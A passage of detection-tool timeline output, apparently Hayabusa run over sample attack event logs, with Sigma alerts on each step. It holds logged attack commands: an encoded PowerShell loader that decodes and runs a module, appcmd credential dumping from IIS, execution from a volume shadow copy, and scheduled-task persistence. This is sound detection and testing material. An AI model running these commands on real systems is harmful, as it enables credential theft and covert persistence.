9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.403 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.473 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.563 
+00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.784 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.894 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.964 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | 
Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.034 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.124 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.204 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName 
| Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.305 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.435 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.555 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
)"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 15:12:38.241 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.241 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as 
SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:43.990 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:43.990 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:44.055 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:44.055 +00:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote 
Services,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.405 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.405 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.491 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.491 +00:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:46.981 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | 
Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:46.981 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.402 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.402 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.478 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 
15:12:47.478 +00:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.655 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.655 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.763 +00:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.827 +00:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.447 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c 
%%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.447 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.544 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.544 +00:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.544 +00:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.632 +00:00,IEWIN7,1,info,,Process Created,Cmd: 
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.632 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:59.519 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:59.519 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:59.578 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" 
/tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 02:13:52.171 +00:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:13:52.429 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:13:53.507 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | 
PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:14:48.819 +00:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:14:49.194 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" 